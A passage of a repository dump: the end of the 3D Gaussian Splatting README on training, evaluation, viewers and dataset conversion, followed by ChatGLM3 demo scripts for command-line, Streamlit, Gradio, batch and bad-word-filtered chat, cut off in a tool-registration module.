of ours. #### --debug Enables debug mode if you experience erros. If the rasterizer fails, a ```dump``` file is created that you may forward to us in an issue so we can take a look. #### --debug_from Debugging is **slow**. You may specify an iteration (starting from 0) after which the above debugging becomes active. #### --iterations Number of total iterations to train for, ```30_000``` by default. #### --ip IP to start GUI server on, ```127.0.0.1``` by default. #### --port Port to use for GUI server, ```6009``` by default. #### --test_iterations Space-separated iterations at which the training script computes L1 and PSNR over test set, ```7000 30000``` by default. #### --save_iterations Space-separated iterations at which the training script saves the Gaussian model, ```7000 30000 <iterations>``` by default. #### --checkpoint_iterations Space-separated iterations at which to store a checkpoint for continuing later, saved in the model directory. #### --start_checkpoint Path to a saved checkpoint to continue training from. #### --quiet Flag to omit any text written to standard out pipe. #### --feature_lr Spherical harmonics features learning rate, ```0.0025``` by default. #### --opacity_lr Opacity learning rate, ```0.05``` by default. #### --scaling_lr Scaling learning rate, ```0.005``` by default. #### --rotation_lr Rotation learning rate, ```0.001``` by default. #### --position_lr_max_steps Number of steps (from 0) where position learning rate goes from ```initial``` to ```final```. ```30_000``` by default. #### --position_lr_init Initial 3D position learning rate, ```0.00016``` by default. #### --position_lr_final Final 3D position learning rate, ```0.0000016``` by default. #### --position_lr_delay_mult Position learning rate multiplier (cf. Plenoxels), ```0.01``` by default. #### --densify_from_iter Iteration where densification starts, ```500``` by default. #### --densify_until_iter Iteration where densification stops, ```15_000``` by default. #### --densify_grad_threshold Limit that decides if points should be densified based on 2D position gradient, ```0.0002``` by default. #### --densification_interval How frequently to densify, ```100``` (every 100 iterations) by default. #### --opacity_reset_interval How frequently to reset opacity, ```3_000``` by default. #### --lambda_dssim Influence of SSIM on total loss from 0 to 1, ```0.2``` by default. #### --percent_dense Percentage of scene extent (0--1) a point must exceed to be forcibly densified, ```0.01``` by default. </details> <br> Note that similar to MipNeRF360, we target images at resolutions in the 1-1.6K pixel range. For convenience, arbitrary-size inputs can be passed and will be automatically resized if their width exceeds 1600 pixels. We recommend to keep this behavior, but you may force training to use your higher-resolution images by setting ```-r 1```. The MipNeRF360 scenes are hosted by the paper authors [here](https://jonbarron.info/mipnerf360/). You can find our SfM data sets for Tanks&Temples and Deep Blending [here](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/datasets/input/tandt_db.zip). If you do not provide an output model directory (```-m```), trained models are written to folders with randomized unique names inside the ```output``` directory. At this point, the trained models may be viewed with the real-time viewer (see further below). ### Evaluation By default, the trained models use all available images in the dataset. To train them while withholding a test set for evaluation, use the ```--eval``` flag. This way, you can render training/test sets and produce error metrics as follows: ```shell python train.py -s <path to COLMAP or NeRF Synthetic dataset> --eval # Train with train/test split python render.py -m <path to trained model> # Generate renderings python metrics.py -m <path to trained model> # Compute error metrics on renderings ``` If you want to evaluate our [pre-trained models](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/datasets/pretrained/models.zip), you will have to download the corresponding source data sets and indicate their location to ```render.py``` with an additional ```--source_path/-s``` flag. Note: The pre-trained models were created with the release codebase. This code base has been cleaned up and includes bugfixes, hence the metrics you get from evaluating them will differ from those in the paper. ```shell python render.py -m <path to pre-trained model> -s <path to COLMAP dataset> python metrics.py -m <path to pre-trained model> ``` <details> <summary><span style="font-weight: bold;">Command Line Arguments for render.py</span></summary> #### --model_path / -m Path to the trained model directory you want to create renderings for. #### --skip_train Flag to skip rendering the training set. #### --skip_test Flag to skip rendering the test set. #### --quiet Flag to omit any text written to standard out pipe. **The below parameters will be read automatically from the model path, based on what was used for training. However, you may override them by providing them explicitly on the command line.** #### --source_path / -s Path to the source directory containing a COLMAP or Synthetic NeRF data set. #### --images / -i Alternative subdirectory for COLMAP images (```images``` by default). #### --eval Add this flag to use a MipNeRF360-style training/test split for evaluation. #### --resolution / -r Changes the resolution of the loaded images before training. If provided ```1, 2, 4``` or ```8```, uses original, 1/2, 1/4 or 1/8 resolution, respectively. For all other values, rescales the width to the given number while maintaining image aspect. ```1``` by default. #### --white_background / -w Add this flag to use white background instead of black (default), e.g., for evaluation of NeRF Synthetic dataset. #### --convert_SHs_python Flag to make pipeline render with computed SHs from PyTorch instead of ours. #### --convert_cov3D_python Flag to make pipeline render with computed 3D covariance from PyTorch instead of ours. </details> <details> <summary><span style="font-weight: bold;">Command Line Arguments for metrics.py</span></summary> #### --model_paths / -m Space-separated list of model paths for which metrics should be computed. </details> <br> We further provide the ```full_eval.py``` script. This script specifies the routine used in our evaluation and demonstrates the use of some additional parameters, e.g., ```--images (-i)``` to define alternative image directories within COLMAP data sets. If you have downloaded and extracted all the training data, you can run it like this: ```shell python full_eval.py -m360 <mipnerf360 folder> -tat <tanks and temples folder> -db <deep blending folder> ``` In the current version, this process takes about 7h on our reference machine containing an A6000. If you want to do the full evaluation on our pre-trained models, you can specify their download location and skip training. ```shell python full_eval.py -o <directory with pretrained models> --skip_training -m360 <mipnerf360 folder> -tat <tanks and temples folder> -db <deep blending folder> ``` If you want to compute the metrics on our paper's [evaluation images](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/evaluation/images.zip), you can also skip rendering. In this case it is not necessary to provide the source datasets. You can compute metrics for multiple image sets at a time. ```shell python full_eval.py -m <directory with evaluation images>/garden ... --skip_training --skip_rendering ``` <details> <summary><span style="font-weight: bold;">Command Line Arguments for full_eval.py</span></summary> #### --skip_training Flag to skip training stage. #### --skip_rendering Flag to skip rendering stage. #### --skip_metrics Flag to skip metrics calculation stage. #### --output_path Directory to put renderings and results in, ```./eval``` by default, set to pre-trained model location if evaluating them. #### --mipnerf360 / -m360 Path to MipNeRF360 source datasets, required if training or rendering. #### --tanksandtemples / -tat Path to Tanks&Temples source datasets, required if training or rendering. #### --deepblending / -db Path to Deep Blending source datasets, required if training or rendering. </details> <br> ## Interactive Viewers We provide two interactive viewers for our method: remote and real-time. Our viewing solutions are based on the [SIBR](https://sibr.gitlabpages.inria.fr/) framework, developed by the GRAPHDECO group for several novel-view synthesis projects. ### Hardware Requirements - OpenGL 4.5-ready GPU and drivers (or latest MESA software) - 4 GB VRAM recommended - CUDA-ready GPU with Compute Capability 7.0+ (only for Real-Time Viewer) ### Software Requirements - Visual Studio or g++, **not Clang** (we used Visual Studio 2019 for Windows) - CUDA SDK 11, install *after* Visual Studio (we used 11.8) - CMake (recent version, we used 3.24) - 7zip (only on Windows) ### Pre-built Windows Binaries We provide pre-built binaries for Windows [here](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/binaries/viewers.zip). We recommend using them on Windows for an efficient setup, since the building of SIBR involves several external dependencies that must be downloaded and compiled on-the-fly. ### Installation from Source If you cloned with submodules (e.g., using ```--recursive```), the source code for the viewers is found in ```SIBR_viewers```. The network viewer runs within the SIBR framework for Image-based Rendering applications. #### Windows CMake should take care of your dependencies. ```shell cd SIBR_viewers cmake -Bbuild . cmake --build build --target install --config RelWithDebInfo ``` You may specify a different configuration, e.g. ```Debug``` if you need more control during development. #### Ubuntu 22.04 You will need to install a few dependencies before running the project setup. ```shell # Dependencies sudo apt install -y libglew-dev libassimp-dev libboost-all-dev libgtk-3-dev libopencv-dev libglfw3-dev libavdevice-dev libavcodec-dev libeigen3-dev libxxf86vm-dev libembree-dev # Project setup cd SIBR_viewers cmake -Bbuild . -DCMAKE_BUILD_TYPE=Release # add -G Ninja to build faster cmake --build build -j24 --target install ``` #### Ubuntu 20.04 Backwards compatibility with Focal Fossa is not fully tested, but building SIBR with CMake should still work after invoking ```shell git checkout fossa_compatibility ``` ### Navigation in SIBR Viewers The SIBR interface provides several methods of navigating the scene. By default, you will be started with an FPS navigator, which you can control with ```W, A, S, D, Q, E``` for camera translation and ```I, K, J, L, U, O``` for rotation. Alternatively, you may want to use a Trackball-style navigator (select from the floating menu). You can also snap to a camera from the data set with the ```Snap to``` button or find the closest camera with ```Snap to closest```. The floating menues also allow you to change the navigation speed. You can use the ```Scaling Modifier``` to control the size of the displayed Gaussians, or show the initial point cloud. ### Running the Network Viewer https://github.com/graphdeco-inria/gaussian-splatting/assets/40643808/90a2e4d3-cf2e-4633-b35f-bfe284e28ff7 After extracting or installing the viewers, you may run the compiled ```SIBR_remoteGaussian_app[_config]``` app in ```<SIBR install dir>/bin```, e.g.: ```shell ./<SIBR install dir>/bin/SIBR_remoteGaussian_app ``` The network viewer allows you to connect to a running training process on the same or a different machine. If you are training on the same machine and OS, no command line parameters should be required: the optimizer communicates the location of the training data to the network viewer. By default, optimizer and network viewer will try to establish a connection on **localhost** on port **6009**. You can change this behavior by providing matching ```--ip``` and ```--port``` parameters to both the optimizer and the network viewer. If for some reason the path used by the optimizer to find the training data is not reachable by the network viewer (e.g., due to them running on different (virtual) machines), you may specify an override location to the viewer by using ```-s <source path>```. <details> <summary><span style="font-weight: bold;">Primary Command Line Arguments for Network Viewer</span></summary> #### --path / -s Argument to override model's path to source dataset. #### --ip IP to use for connection to a running training script. #### --port Port to use for connection to a running training script. #### --rendering-size Takes two space separated numbers to define the resolution at which network rendering occurs, ```1200``` width by default. Note that to enforce an aspect that differs from the input images, you need ```--force-aspect-ratio``` too. #### --load_images Flag to load source dataset images to be displayed in the top view for each camera. </details> <br> ### Running the Real-Time Viewer https://github.com/graphdeco-inria/gaussian-splatting/assets/40643808/0940547f-1d82-4c2f-a616-44eabbf0f816 After extracting or installing the viewers, you may run the compiled ```SIBR_gaussianViewer_app[_config]``` app in ```<SIBR install dir>/bin```, e.g.: ```shell ./<SIBR install dir>/bin/SIBR_gaussianViewer_app -m <path to trained model> ``` It should suffice to provide the ```-m``` parameter pointing to a trained model directory. Alternatively, you can specify an override location for training input data using ```-s```. To use a specific resolution other than the auto-chosen one, specify ```--rendering-size <width> <height>```. Combine it with ```--force-aspect-ratio``` if you want the exact resolution and don't mind image distortion. **To unlock the full frame rate, please disable V-Sync on your machine and also in the application (Menu &rarr; Display). In a multi-GPU system (e.g., laptop) your OpenGL/Display GPU should be the same as your CUDA GPU (e.g., by setting the application's GPU preference on Windows, see below) for maximum performance.** ![Teaser image](assets/select.png) In addition to the initial point cloud and the splats, you also have the option to visualize the Gaussians by rendering them as ellipsoids from the floating menu. SIBR has many other functionalities, please see the [documentation](https://sibr.gitlabpages.inria.fr/) for more details on the viewer, navigation options etc. There is also a Top View (available from the menu) that shows the placement of the input cameras and the original SfM point cloud; please note that Top View slows rendering when enabled. The real-time viewer also uses slightly more aggressive, fast culling, which can be toggled in the floating menu. If you ever encounter an issue that can be solved by turning fast culling off, please let us know. <details> <summary><span style="font-weight: bold;">Primary Command Line Arguments for Real-Time Viewer</span></summary> #### --model-path / -m Path to trained model. #### --iteration Specifies which of state to load if multiple are available. Defaults to latest available iteration. #### --path / -s Argument to override model's path to source dataset. #### --rendering-size Takes two space separated numbers to define the resolution at which real-time rendering occurs, ```1200``` width by default. Note that to enforce an aspect that differs from the input images, you need ```--force-aspect-ratio``` too. #### --load_images Flag to load source dataset images to be displayed in the top view for each camera. #### --device Index of CUDA device to use for rasterization if multiple are available, ```0``` by default. #### --no_interop Disables CUDA/GL interop forcibly. Use on systems that may not behave according to spec (e.g., WSL2 with MESA GL 4.5 software rendering). </details> <br> ## Processing your own Scenes Our COLMAP loaders expect the following dataset structure in the source path location: ``` <location> |---images | |---<image 0> | |---<image 1> | |---... |---sparse |---0 |---cameras.bin |---images.bin |---points3D.bin ``` For rasterization, the camera models must be either a SIMPLE_PINHOLE or PINHOLE camera. We provide a converter script ```convert.py```, to extract undistorted images and SfM information from input images. Optionally, you can use ImageMagick to resize the undistorted images. This rescaling is similar to MipNeRF360, i.e., it creates images with 1/2, 1/4 and 1/8 the original resolution in corresponding folders. To use them, please first install a recent version of COLMAP (ideally CUDA-powered) and ImageMagick. Put the images you want to use in a directory ```<location>/input```. ``` <location> |---input |---<image 0> |---<image 1> |---... ``` If you have COLMAP and ImageMagick on your system path, you can simply run ```shell python convert.py -s <location> [--resize] #If not resizing, ImageMagick is not needed ``` Alternatively, you can use the optional parameters ```--colmap_executable``` and ```--magick_executable``` to point to the respective paths. Please note that on Windows, the executable should point to the COLMAP ```.bat``` file that takes care of setting the execution environment. Once done, ```<location>``` will contain the expected COLMAP data set structure with undistorted, resized input images, in addition to your original images and some temporary (distorted) data in the directory ```distorted```. If you have your own COLMAP dataset without undistortion (e.g., using ```OPENCV``` camera), you can try to just run the last part of the script: Put the images in ```input``` and the COLMAP info in a subdirectory ```distorted```: ``` <location> |---input | |---<image 0> | |---<image 1> | |---... |---distorted |---database.db |---sparse |---0 |---... ``` Then run ```shell python convert.py -s <location> --skip_matching [--resize] #If not resizing, ImageMagick is not needed ``` <details> <summary><span style="font-weight: bold;">Command Line Arguments for convert.py</span></summary> #### --no_gpu Flag to avoid using GPU in COLMAP. #### --skip_matching Flag to indicate that COLMAP info is available for images. #### --source_path / -s Location of the inputs. #### --camera Which camera model to use for the early matching steps, ```OPENCV``` by default. #### --resize Flag for creating resized versions of input images. #### --colmap_executable Path to the COLMAP executable (```.bat``` on Windows). #### --magick_executable Path to the ImageMagick executable. </details> <br> ### OpenXR support OpenXR is supported in the branch gaussian_code_release_openxr Within that branch, you can find documentation for VR support [here](https://gitlab.inria.fr/sibr/sibr_core/-/tree/gaussian_code_release_openxr?ref_type=heads). ## FAQ - *Where do I get data sets, e.g., those referenced in ```full_eval.py```?* The MipNeRF360 data set is provided by the authors of the original paper on the project site. Note that two of the data sets cannot be openly shared and require you to consult the authors directly. For Tanks&Temples and Deep Blending, please use the download links provided at the top of the page. Alternatively, you may access the cloned data (status: August 2023!) from [HuggingFace](https://huggingface.co/camenduru/gaussian-splatting) - *How can I use this for a much larger dataset, like a city district?* The current method was not designed for these, but given enough memory, it should work out. However, the approach can struggle in multi-scale detail scenes (extreme close-ups, mixed with far-away shots). This is usually the case in, e.g., driving data sets (cars close up, buildings far away). For such scenes, you can lower the ```--position_lr_init```, ```--position_lr_final``` and ```--scaling_lr``` (x0.3, x0.1, ...). The more extensive the scene, the lower these values should be. Below, we use default learning rates (left) and ```--position_lr_init 0.000016 --scaling_lr 0.001"``` (right). | ![Default learning rate result](assets/worse.png "title-1") <!-- --> | <!-- --> ![Reduced learning rate result](assets/better.png "title-2") | | --- | --- | - *I'm on Windows and I can't manage to build the submodules, what do I do?* Consider following the steps in the excellent video tutorial [here](https://www.youtube.com/watch?v=UXtuigy_wYc), hopefully they should help. The order in which the steps are done is important! Alternatively, consider using the linked Colab template. - *It still doesn't work. It says something about ```cl.exe```. What do I do?* User Henry Pearce found a workaround. You can you try adding the visual studio path to your environment variables (your version number might differ); ```C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64``` Then make sure you start a new conda prompt and cd to your repo location and try this; ``` conda activate gaussian_splatting cd <dir_to_repo>/gaussian-splatting pip install submodules\diff-gaussian-rasterization pip install submodules\simple-knn ``` - *I'm on macOS/Puppy Linux/Greenhat and I can't manage to build, what do I do?* Sorry, we can't provide support for platforms outside of the ones we list in this README. Consider using the linked Colab template. - *I don't have 24 GB of VRAM for training, what do I do?* The VRAM consumption is determined by the number of points that are being optimized, which increases over time. If you only want to train to 7k iterations, you will need significantly less. To do the full training routine and avoid running out of memory, you can increase the ```--densify_grad_threshold```, ```--densification_interval``` or reduce the value of ```--densify_until_iter```. Note however that this will affect the quality of the result. Also try setting ```--test_iterations``` to ```-1``` to avoid memory spikes during testing. If ```--densify_grad_threshold``` is very high, no densification should occur and training should complete if the scene itself loads successfully. - *24 GB of VRAM for reference quality training is still a lot! Can't we do it with less?* Yes, most likely. By our calculations it should be possible with **way** less memory (~8GB). If we can find the time we will try to achieve this. If some PyTorch veteran out there wants to tackle this, we look forward to your pull request! - *How can I use the differentiable Gaussian rasterizer for my own project?* Easy, it is included in this repo as a submodule ```diff-gaussian-rasterization```. Feel free to check out and install the package. It's not really documented, but using it from the Python side is very straightforward (cf. ```gaussian_renderer/__init__.py```). - *Wait, but ```<insert feature>``` isn't optimized and could be much better?* There are several parts we didn't even have time to think about improving (yet). The performance you get with this prototype is probably a rather slow baseline for what is physically possible. - *Something is broken, how did this happen?* We tried hard to provide a solid and comprehensible basis to make use of the paper's method. We have refactored the code quite a bit, but we have limited capacity to test all possible usage scenarios. Thus, if part of the website, the code or the performance is lacking, please create an issue. If we find the time, we will do our best to address it.
ChatGLM3
045be71ff8df03b8819a6560866c9a86ec9be363
File: basic_demo/cli_demo.py import os import platform from transformers import AutoTokenizer, AutoModel MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() # add .quantize(bits=4, device="cuda").cuda() before .eval() to use int4 model # must use cuda to load int4 model os_name = platform.system() clear_command = 'cls' if os_name == 'Windows' else 'clear' stop_stream = False welcome_prompt = "欢迎使用 ChatGLM3-6B 模型,输入内容即可进行对话,clear 清空对话历史,stop 终止程序" def build_prompt(history): prompt = welcome_prompt for query, response in history: prompt += f"\n\n用户:{query}" prompt += f"\n\nChatGLM3-6B:{response}" return prompt def main(): past_key_values, history = None, [] global stop_stream print(welcome_prompt) while True: query = input("\n用户:") if query.strip() == "stop": break if query.strip() == "clear": past_key_values, history = None, [] os.system(clear_command) print(welcome_prompt) continue print("\nChatGLM:", end="") current_length = 0 for response, history, past_key_values in model.stream_chat(tokenizer, query, history=history, top_p=1, temperature=0.01, past_key_values=past_key_values, return_past_key_values=True): if stop_stream: stop_stream = False break else: print(response[current_length:], end="", flush=True) current_length = len(response) print("") if __name__ == "__main__": main() File: basic_demo/web_demo_streamlit.py """ This script is a simple web demo based on Streamlit, showcasing the use of the ChatGLM3-6B model. For a more comprehensive web demo, it is recommended to use 'composite_demo'. Usage: - Run the script using Streamlit: `streamlit run web_demo_streamlit.py` - Adjust the model parameters from the sidebar. - Enter questions in the chat input box and interact with the ChatGLM3-6B model. Note: Ensure 'streamlit' and 'transformers' libraries are installed and the required model checkpoints are available. """ import os import streamlit as st import torch from transformers import AutoModel, AutoTokenizer MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) st.set_page_config( page_title="ChatGLM3-6B Streamlit Simple Demo", page_icon=":robot:", layout="wide" ) @st.cache_resource def get_model(): tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() return tokenizer, model # 加载Chatglm3的model和tokenizer tokenizer, model = get_model() if "history" not in st.session_state: st.session_state.history = [] if "past_key_values" not in st.session_state: st.session_state.past_key_values = None max_length = st.sidebar.slider("max_length", 0, 32768, 8192, step=1) top_p = st.sidebar.slider("top_p", 0.0, 1.0, 0.8, step=0.01) temperature = st.sidebar.slider("temperature", 0.0, 1.0, 0.6, step=0.01) buttonClean = st.sidebar.button("清理会话历史", key="clean") if buttonClean: st.session_state.history = [] st.session_state.past_key_values = None if torch.cuda.is_available(): torch.cuda.empty_cache() st.rerun() for i, message in enumerate(st.session_state.history): if message["role"] == "user": with st.chat_message(name="user", avatar="user"): st.markdown(message["content"]) else: with st.chat_message(name="assistant", avatar="assistant"): st.markdown(message["content"]) with st.chat_message(name="user", avatar="user"): input_placeholder = st.empty() with st.chat_message(name="assistant", avatar="assistant"): message_placeholder = st.empty() prompt_text = st.chat_input("请输入您的问题") if prompt_text: input_placeholder.markdown(prompt_text) history = st.session_state.history past_key_values = st.session_state.past_key_values for response, history, past_key_values in model.stream_chat( tokenizer, prompt_text, history, past_key_values=past_key_values, max_length=max_length, top_p=top_p, temperature=temperature, return_past_key_values=True, ): message_placeholder.markdown(response) st.session_state.history = history st.session_state.past_key_values = past_key_values File: basic_demo/cli_demo_bad_word_ids.py """ This script demonstrates how to use the `bad_words_ids` argument in the context of a conversational AI model to filter out unwanted words or phrases from the model's responses. It's designed to showcase a fundamental method of content moderation within AI-generated text, particularly useful in scenarios where maintaining the decorum of the conversation is essential. Usage: - Interact with the model by typing queries. The model will generate responses while avoiding the specified bad words. - Use 'clear' to clear the conversation history and 'stop' to exit the program. Requirements: - The script requires the Transformers library and an appropriate model checkpoint. Note: The `bad_words_ids` feature is an essential tool for controlling the output of language models, particularly in user-facing applications where content moderation is crucial. """ import os import platform from transformers import AutoTokenizer, AutoModel MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() os_name = platform.system() clear_command = 'cls' if os_name == 'Windows' else 'clear' stop_stream = False welcome_prompt = "欢迎使用 ChatGLM3-6B 模型,输入内容即可进行对话,clear 清空对话历史,stop 终止程序" # probability tensor contains either `inf`, `nan` or element < 0 bad_words = ["你好", "ChatGLM"] bad_word_ids = [tokenizer.encode(bad_word, add_special_tokens=False) for bad_word in bad_words] def build_prompt(history): prompt = welcome_prompt for query, response in history: prompt += f"\n\n用户:{query}" prompt += f"\n\nChatGLM3-6B:{response}" return prompt def main(): past_key_values, history = None, [] global stop_stream print(welcome_prompt) while True: query = input("\n用户:") if query.strip().lower() == "stop": break if query.strip().lower() == "clear": past_key_values, history = None, [] os.system(clear_command) print(welcome_prompt) continue # Attempt to generate a response try: print("\nChatGLM:", end="") current_length = 0 response_generated = False for response, history, past_key_values in model.stream_chat( tokenizer, query, history=history, top_p=1, temperature=0.01, past_key_values=past_key_values, return_past_key_values=True, bad_words_ids=bad_word_ids # assuming this is implemented correctly ): response_generated = True # Check if the response contains any bad words if any(bad_word in response for bad_word in bad_words): print("我的回答涉嫌了 bad word") break # Break the loop if a bad word is detected # Otherwise, print the generated response print(response[current_length:], end="", flush=True) current_length = len(response) if not response_generated: print("没有生成任何回答。") except RuntimeError as e: print(f"生成文本时发生错误:{e},这可能是涉及到设定的敏感词汇") print("") if __name__ == "__main__": main() File: basic_demo/web_demo_gradio.py """ This script creates an interactive web demo for the ChatGLM3-6B model using Gradio, a Python library for building quick and easy UI components for machine learning models. It's designed to showcase the capabilities of the ChatGLM3-6B model in a user-friendly interface, allowing users to interact with the model through a chat-like interface. Usage: - Run the script to start the Gradio web server. - Interact with the model by typing questions and receiving responses. Requirements: - Gradio (required for 4.13.0 and later, 3.x is not support now) should be installed. Note: The script includes a modification to the Chatbot's postprocess method to handle markdown to HTML conversion, ensuring that the chat interface displays formatted text correctly. """ import os import gradio as gr import torch from threading import Thread from typing import Union, Annotated from pathlib import Path from peft import AutoPeftModelForCausalLM, PeftModelForCausalLM from transformers import ( AutoModelForCausalLM, AutoTokenizer, PreTrainedModel, PreTrainedTokenizer, PreTrainedTokenizerFast, StoppingCriteria, StoppingCriteriaList, TextIteratorStreamer ) ModelType = Union[PreTrainedModel, PeftModelForCausalLM] TokenizerType = Union[PreTrainedTokenizer, PreTrainedTokenizerFast] MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) def _resolve_path(path: Union[str, Path]) -> Path: return Path(path).expanduser().resolve() def load_model_and_tokenizer( model_dir: Union[str, Path], trust_remote_code: bool = True ) -> tuple[ModelType, TokenizerType]: model_dir = _resolve_path(model_dir) if (model_dir / 'adapter_config.json').exists(): model = AutoPeftModelForCausalLM.from_pretrained( model_dir, trust_remote_code=trust_remote_code, device_map='auto' ) tokenizer_dir = model.peft_config['default'].base_model_name_or_path else: model = AutoModelForCausalLM.from_pretrained( model_dir, trust_remote_code=trust_remote_code, device_map='auto' ) tokenizer_dir = model_dir tokenizer = AutoTokenizer.from_pretrained( tokenizer_dir, trust_remote_code=trust_remote_code ) return model, tokenizer model, tokenizer = load_model_and_tokenizer(MODEL_PATH, trust_remote_code=True) class StopOnTokens(StoppingCriteria): def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor, **kwargs) -> bool: stop_ids = [0, 2] for stop_id in stop_ids: if input_ids[0][-1] == stop_id: return True return False def parse_text(text): lines = text.split("\n") lines = [line for line in lines if line != ""] count = 0 for i, line in enumerate(lines): if "```" in line: count += 1 items = line.split('`') if count % 2 == 1: lines[i] = f'<pre><code class="language-{items[-1]}">' else: lines[i] = f'<br></code></pre>' else: if i > 0: if count % 2 == 1: line = line.replace("`", "\`") line = line.replace("<", "&lt;") line = line.replace(">", "&gt;") line = line.replace(" ", "&nbsp;") line = line.replace("*", "&ast;") line = line.replace("_", "&lowbar;") line = line.replace("-", "&#45;") line = line.replace(".", "&#46;") line = line.replace("!", "&#33;") line = line.replace("(", "&#40;") line = line.replace(")", "&#41;") line = line.replace("$", "&#36;") lines[i] = "<br>" + line text = "".join(lines) return text def predict(history, max_length, top_p, temperature): stop = StopOnTokens() messages = [] for idx, (user_msg, model_msg) in enumerate(history): if idx == len(history) - 1 and not model_msg: messages.append({"role": "user", "content": user_msg}) break if user_msg: messages.append({"role": "user", "content": user_msg}) if model_msg: messages.append({"role": "assistant", "content": model_msg}) print("\n\n====conversation====\n", messages) model_inputs = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=True, return_tensors="pt").to(next(model.parameters()).device) streamer = TextIteratorStreamer(tokenizer, timeout=60, skip_prompt=True, skip_special_tokens=True) generate_kwargs = { "input_ids": model_inputs, "streamer": streamer, "max_new_tokens": max_length, "do_sample": True, "top_p": top_p, "temperature": temperature, "stopping_criteria": StoppingCriteriaList([stop]), "repetition_penalty": 1.2, } t = Thread(target=model.generate, kwargs=generate_kwargs) t.start() for new_token in streamer: if new_token != '': history[-1][1] += new_token yield history with gr.Blocks() as demo: gr.HTML("""<h1 align="center">ChatGLM3-6B Gradio Simple Demo</h1>""") chatbot = gr.Chatbot() with gr.Row(): with gr.Column(scale=4): with gr.Column(scale=12): user_input = gr.Textbox(show_label=False, placeholder="Input...", lines=10, container=False) with gr.Column(min_width=32, scale=1): submitBtn = gr.Button("Submit") with gr.Column(scale=1): emptyBtn = gr.Button("Clear History") max_length = gr.Slider(0, 32768, value=8192, step=1.0, label="Maximum length", interactive=True) top_p = gr.Slider(0, 1, value=0.8, step=0.01, label="Top P", interactive=True) temperature = gr.Slider(0.01, 1, value=0.6, step=0.01, label="Temperature", interactive=True) def user(query, history): return "", history + [[parse_text(query), ""]] submitBtn.click(user, [user_input, chatbot], [user_input, chatbot], queue=False).then( predict, [chatbot, max_length, top_p, temperature], chatbot ) emptyBtn.click(lambda: None, None, chatbot, queue=False) demo.queue() demo.launch(server_name="127.0.0.1", server_port=7870, inbrowser=True, share=False) File: basic_demo/cli_batch_request_demo.py import os from typing import Optional, Union from transformers import AutoModel, AutoTokenizer, LogitsProcessorList MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() def batch( model, tokenizer, prompts: Union[str, list[str]], max_length: int = 8192, num_beams: int = 1, do_sample: bool = True, top_p: float = 0.8, temperature: float = 0.8, logits_processor: Optional[LogitsProcessorList] = LogitsProcessorList(), ): tokenizer.encode_special_tokens = True if isinstance(prompts, str): prompts = [prompts] batched_inputs = tokenizer(prompts, return_tensors="pt", padding="longest") batched_inputs = batched_inputs.to(model.device) eos_token_id = [ tokenizer.eos_token_id, tokenizer.get_command("<|user|>"), tokenizer.get_command("<|assistant|>"), ] gen_kwargs = { "max_length": max_length, "num_beams": num_beams, "do_sample": do_sample, "top_p": top_p, "temperature": temperature, "logits_processor": logits_processor, "eos_token_id": eos_token_id, } batched_outputs = model.generate(**batched_inputs, **gen_kwargs) batched_response = [] for input_ids, output_ids in zip(batched_inputs.input_ids, batched_outputs): decoded_text = tokenizer.decode(output_ids[len(input_ids):]) batched_response.append(decoded_text.strip()) return batched_response def main(batch_queries): gen_kwargs = { "max_length": 2048, "do_sample": True, "top_p": 0.8, "temperature": 0.8, "num_beams": 1, } batch_responses = batch(model, tokenizer, batch_queries, **gen_kwargs) return batch_responses if __name__ == "__main__": batch_queries = [ "<|user|>\n讲个故事\n<|assistant|>", "<|user|>\n讲个爱情故事\n<|assistant|>", "<|user|>\n讲个开心故事\n<|assistant|>", "<|user|>\n讲个睡前故事\n<|assistant|>", "<|user|>\n讲个励志的故事\n<|assistant|>", "<|user|>\n讲个少壮不努力的故事\n<|assistant|>", "<|user|>\n讲个青春校园恋爱故事\n<|assistant|>", "<|user|>\n讲个工作故事\n<|assistant|>", "<|user|>\n讲个旅游的故事\n<|assistant|>", ] batch_responses = main(batch_queries) for response in batch_responses: print("=" * 10) print(response) File: tools_using_demo/tool_register.py """ 这段代码是工具注册的部分,通过注册工具,让模型实现工具调用 """ import inspect import traceback from copy import deepcopy from pprint import pformat from types import GenericAlias from typing import get_origin, Annotated _TOOL_HOOKS = {} _TOOL_DESCRIPTIONS = {} def register_tool(func: callable): tool_name = func.__name__ tool_description = inspect.getdoc(func).strip() python_params = inspect.signature(func).parameters tool_params = [] for name, param in python_params.items(): annotation = param.annotation if annotation is inspect.Parameter.empty: raise TypeError(f"Parameter `{name}` missing type annotation") if get_origin(annotation) != Annotated: raise TypeError(f"Annotation type for `{name}` must be typing.Annotated") typ, (description, required) = annotation.__origin__, annotation.__metadata__ typ: str = str(typ) if isinstance(typ, GenericAlias) else typ.__name__ if not isinstance(description, str): raise 